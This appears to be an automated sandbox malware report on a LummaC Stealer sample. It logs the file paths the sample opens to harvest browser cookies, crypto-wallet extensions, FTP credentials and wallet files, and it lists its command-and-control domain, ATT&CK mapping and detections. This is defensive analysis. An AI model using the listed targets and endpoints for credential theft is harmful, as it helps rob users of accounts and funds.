                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                Source: Yara matchFile source: 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1982904201.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1983969551.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2033433013.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1983497240.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1900851363.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2063694200.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2033655753.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1980367222.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2064442018.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1982875210.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1982622436.0000000001B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2034685044.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.1984430461.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.2058810259.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 5448, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dileapp.exe PID: 5448, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts2
                Windows Management Instrumentation                		1
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts13
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		12
                Process Injection                		3
                Obfuscated Files or Information                		LSASS Memory12
                File and Directory Discovery                		Remote Desktop Protocol41
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		1
                Registry Run Keys / Startup Folder                		13
                Software Packing                		Security Account Manager246
                System Information Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading                		NTDS1
                Query Registry                		Distributed Component Object ModelInput Capture14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets771
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry                		Cached Domain Credentials34
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items34
                Virtualization/Sandbox Evasion                		DCSync2
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565453 Sample: file.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 47 water-acidict.cyou 2->47 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 8 other signatures 2->61 9 file.exe 7 2->9         started        12 dileapp.exe 2->12         started        15 dileapp.exe 2->15         started        17 dileapp.exe 2->17         started        signatures3 process4 file5 37 C:\Users\Public37etstat\dileapp.exe, PE32 9->37 dropped 39 C:\Users\Public39etstat\s.bat, DOS 9->39 dropped 19 cmd.exe 13 9->19         started        73 Query firmware table information (likely to detect VMs) 12->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 12->75 77 Tries to harvest and steal ftp login credentials 12->77 79 Tries to harvest and steal browser information (history, passwords, etc) 12->79 81 Tries to steal Crypto Currency Wallets 15->81 83 Hides threads from debuggers 15->83 85 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->85 87 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->87 signatures6 process7 signatures8 63 Uses cmd line tools excessively to alter registry or file data 19->63 22 dileapp.exe 19->22         started        26 chrome.exe 1 19->26         started        28 conhost.exe 19->28         started        30 2 other processes 19->30 process9 dnsIp10 49 water-acidict.cyou 172.67.156.217, 443, 49738, 49742 CLOUDFLARENETUS United States 22->49 65 Antivirus detection for dropped file 22->65 67 Detected unpacking (changes PE section rights) 22->67 69 Tries to detect sandboxes and other dynamic analysis tools (window names) 22->69 71 6 other signatures 22->71 51 192.168.2.4, 138, 443, 49294 unknown unknown 26->51 53 239.255.255.250 unknown Reserved 26->53 32 chrome.exe 26->32         started        35 chrome.exe 26->35         started        signatures11 process12 dnsIp13 41 www.google.com 142.250.181.100, 443, 49740, 49790 GOOGLEUS United States 32->41 43 104.21.82.93, 443, 49741, 49744 CLOUDFLARENETUS United States 32->43 45 iplogger.co 172.67.167.249, 443, 49733, 49737 CLOUDFLARENETUS United States 32->45

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe29%ReversingLabsWin32.Trojan.Symmi
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\Netstat\dileapp.exe100%AviraTR/Crypt.XPACK.Gen
                C:\Users\Public\Netstat\dileapp.exe100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://water-acidict.cyou/apiZ0%Avira URL Cloudsafe
                https://water-acidict.cyou/api0%Avira URL Cloudsafe
                https://water-acidict.cyou/P0%Avira URL Cloudsafe
                https://water-acidict.cyou/Z0%Avira URL Cloudsafe
                http://crl.microsoftu0%Avira URL Cloudsafe
                https://water-acidict.cyou/apiS0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/api.0%Avira URL Cloudsafe
                https://water-acidict.cyou/apiC0%Avira URL Cloudsafe
                https://water-acidict.cyou/#0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/apiK0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/api.default-release/key4.dbPK0%Avira URL Cloudsafe
                https://iplogger.co/favicon.ico0%Avira URL Cloudsafe
                https://iplogger.co/1tJFB41tJFB40%Avira URL Cloudsafe
                https://water-acidict.cyou/r0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/apitPK0%Avira URL Cloudsafe
                https://water-acidict.cyou/apiq0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/apil0%Avira URL Cloudsafe
                https://water-acidict.cyou/x0%Avira URL Cloudsafe
                https://water-acidict.cyou/b0%Avira URL Cloudsafe
                https://water-acidict.cyou/apicu0%Avira URL Cloudsafe
                https://water-acidict.cyou/apie0%Avira URL Cloudsafe
                https://water-acidict.cyou/apih0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/api_0%Avira URL Cloudsafe
                https://water-acidict.cyou:443/api0%Avira URL Cloudsafe
                https://water-acidict.cyou/apixd0%Avira URL Cloudsafe
                https://support.micro0%Avira URL Cloudsafe
                https://contile-images.services.mozilla.com/obgoOY0%Avira URL Cloudsafe
                https://iplogger.co/https://iplogger.co/1tJFB4iplogger.co/1tJFB40%Avira URL Cloudsafe
                https://water-acidict.cyou/0%Avira URL Cloudsafe
                https://water-acidict.cyou/apia0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                water-acidict.cyou
                		172.67.156.217
                		truetrue
                  		unknown
                  www.google.com
                  		142.250.181.100
                  		truefalse
                    		high
                    iplogger.co
                    		172.67.167.249
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://water-acidict.cyou/apitrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://iplogger.co/1tJFB4false
                        		unknown
                        https://iplogger.co/favicon.icofalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabdileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://water-acidict.cyou/Pdileapp.exe, 0000000C.00000003.2050815274.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://water-acidict.cyou/apiZdileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://water-acidict.cyou/Zdileapp.exe, 00000009.00000003.1912600429.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microsoftdileapp.exe, 0000000C.00000002.2052375189.0000000001B09000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132397400.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F48000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://water-acidict.cyou/apiSdileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058810259.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://crl.microsoftudileapp.exe, 0000000C.00000003.2050815274.0000000001B06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1926780706.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1952649413.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980367222.0000000001AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
